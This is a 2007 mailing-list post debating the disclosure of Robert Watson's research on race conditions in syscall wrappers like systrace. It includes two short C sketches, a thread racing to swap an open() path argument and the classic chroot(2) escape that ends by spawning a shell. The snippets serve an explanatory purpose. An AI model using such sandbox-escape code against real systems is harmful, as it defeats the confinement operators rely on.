[nycbug-talk] Cambridge Researcher Breaks OpenBSD Systrace

Isaac Levy ike at lesmuug.org
Fri Aug 10 12:12:55 EDT 2007


Wow,

On Aug 9, 2007, at 7:22 PM, Alex Pilosov wrote:
> On Thu, 9 Aug 2007, Miles Nordin wrote:
>
>> I find it a bit disgusting that he understood the issues in 2002 but
>> <snip>
>> some reason which becomes clear over
>> the next few months.
> I believe it is because doing security research inherently takes more
> time than making up conspiracy theories.
>
> -alex

Alex is 100% right here.


On Aug 9, 2007, at 7:38 PM, Peter Wright wrote:
> so what's up - posting his specific concerns on a public mailing list,
> then going to Cambridge from the private sector - spending time to create
> a proper academic paper for a conference (which is in its inaugural year,
> WOOT '07) is considered underhanded, or cause for suspicion of ulterior
> motives?
>
> got it.
>
> -p

Pete is 100% right- the intention is clear, based on the order of
events.

--
Working at extremely deep levels with anything (like this new work)
means a person doesn't get the luxury of time to install every new
app/tool that comes along, even those lauded by the security community-
let alone test them all in any comprehensive manner.

Who stands to lose from this situation?  Don't we all stand to gain?


On Aug 9, 2007, at 7:59 PM, Jonathan Vanasco wrote:

> On Aug 9, 2007, at 1:42 PM, Marc Spitzer wrote:
>
>> An anonymous reader writes "University of Cambridge researcher Robert
>> Watson has published a paper at the First USENIX Workshop On Offensive
>
> I'm just wondering if he contacted OpenBSD , "Systrace, Sudo,
> Sysjail, the TIS GSWTK framework, and CerbNG" first, and worked out a
> disclosure timeframe
>
> I couldn't find that information anywhere.

Well, I just Googled around for it myself and didn't find anything-
BUT, judging from the reactions of the various groups you mention,
direct open disclosure seems the best route here.

I mean really, what is Kristaps Johnson (Sysjail author and generally
cool person) going to do with advance knowledge of this vulnerability?
He'd have to take time out of his work/life to fully comprehend or
replicate it, and then sit on his hands until everyone else knows?

Additionally, to keep some sanity here: Sysjail, as an example, has
never been advertised as production software, and it's very, very new.

>
> Personally, I find that the difference between wanting to offer a
> security researcher a "THANK YOU!!!!" or a 'F**k You for disclosing
> holes in software before I had time to patch my system'

On Zero-Daze:

This is also a fundamental problem which is not trivially resolvable.
   - Therefore, there is no patch on the horizon.
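
For anyone who hasn't dug into the paper yet: as I understand it, the
core problem is a race- a wrapper like systrace checks the syscall
arguments, then the kernel copies them in again to do the real work, so
a second thread can flip the argument buffer in between.  A rough
sketch (paths and details made up by me, not lifted from the paper):

/*
 * Rough sketch of the wrapper-argument race, hypothetical and
 * simplified.  Imagine this running under a syscall wrapper whose
 * policy allows /tmp/allowed but denies the other path; both paths
 * are made up.
 */
#include <fcntl.h>
#include <pthread.h>
#include <string.h>
#include <unistd.h>

static char path[64] = "/tmp/allowed";   /* buffer both threads share */

static void *flipper(void *arg)
{
        (void)arg;
        for (;;) {                       /* keep toggling the argument */
                strcpy(path, "/etc/denied");
                strcpy(path, "/tmp/allowed");
        }
        return NULL;
}

int main(void)
{
        pthread_t t;

        pthread_create(&t, NULL, flipper, NULL);

        /* Keep racing: the wrapper may approve one string while the
           kernel ends up copying in the other. */
        for (;;) {
                int fd = open(path, O_RDONLY);
                if (fd != -1)
                        close(fd);
        }
}

The check and the use have to happen on the same copy of the arguments,
which is (as far as I can tell) why this is an architectural problem
and not a quick-patch situation.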

This isn't a Windows or vendor 'sploit.
   - How do you propose we patch our systems without everyone realizing
"hey, systrace isn't enabled anymore!" (and thereby giving everybody in
the world X days to slam systrace, possibly succeeding with the same or
similar exploits)?  Even just saying "systrace is broken, everyone will
know why in X days" is silly.  It's not like proprietary, locked-down
binaries- we all have the source code here.

This is relatively new software, which a small fraction of very
technical people have deployed, most of whom were running systems long
before it existed.

--
In context, there's no F**k you involved here- software gets cracked,
period.  Any *important* system must have a diverse backup plan, for
every critical component, if it's going to survive the cracks (like,
what's everyone's plan for the dreadful day that OpenSSH gets hosed?
[aside from running for the hills]).

Another aspect of this particular issue: systrace itself is relatively
new (although the idea is not).  It's complicated enough just in its
implementation and use.  Its implications on a running system are more
complicated still, by orders of magnitude.

These kinds of massive-scale security tools take years to mature, and
more years of refinement to come close to meeting their objectives.

- With that stated, my long-winded point is that anyone who's crying
because they didn't have a failure and replacement plan for a critical
piece of software they use isn't really taking the issue seriously.
Depending on any single thing is a risk.  To end this thought, a
related news-quote snippet:

Bruce Schneier's Black Hat Keynote:
"Bruce reiterated his ideas of the "security consumer" who asks "is  
it worth it?" when deciding whether or not to wear a bullet-proof  
vest when walking out his front door."

     From a terrific Black-Hat overview by Richard Bejtlich:
     http://taosecurity.blogspot.com/2007/08/black-hat-usa-2007-round-up-part-2.html

Bruce and Richard are right on these days- IMHO.

--
Additionally, nobody has discussed this angle on this list:
"Systrace is dead, long live Systrace"

+ Systrace isn't dead because of this issue(?); it just has to be
re-thought from scratch in the scope of its implementation.
A successful example of this is jail(2)/jail(8) - it was a response to
chroot(2) exploits, remember?  HOWEVER, jail(2) was not the only
answer- jailing only works because of the audits made to the rest of
the operating system, a tedious and holistic approach which has served
everyone well.  Jailing required nearly every system call to be audited
(and thank goodness the TrustedBSD project just so happened to be doing
a whole lot of that...).
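
For the young'uns, the classic chroot(2) escape that jail(2) was partly
a reaction to went roughly like this- a from-memory sketch, assuming
you're already root inside the chroot, not a polished exploit:

/*
 * Classic chroot(2) escape, simplified from memory.  Needs root
 * inside the chroot; "breakout" and /bin/sh are arbitrary choices.
 */
#include <sys/stat.h>
#include <fcntl.h>
#include <unistd.h>

int main(void)
{
        int i;
        int fd = open(".", O_RDONLY);   /* keep a handle on the old cwd */

        mkdir("breakout", 0700);
        chroot("breakout");             /* push the root below our cwd */
        fchdir(fd);                     /* cwd is now outside the root */

        for (i = 0; i < 64; i++)        /* climb up to the real / ...  */
                chdir("..");
        chroot(".");                    /* ... and reclaim it */

        execl("/bin/sh", "sh", (char *)NULL);
        return 1;
}

jail(2) closes that particular door, but the broader containment only
holds because nearly every other system call got audited along with
it- which is the point above.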
Similarly, the problems with systrace are larger architectural  
issues, which can likely be resolved with continued (and arduous)  
work- and possible consequences and tradeoffs for other kernel  
features.  That stuff has to be figured out- and that work is slow  
and hard.
These were some lessons learned from TrustedBSD, a project to explore
these kinds of patterns in secure development.  (And Robert Watson was
a huge part of that project, btw.)


/me spouting .04¢ on this one

Rocket-
.ike





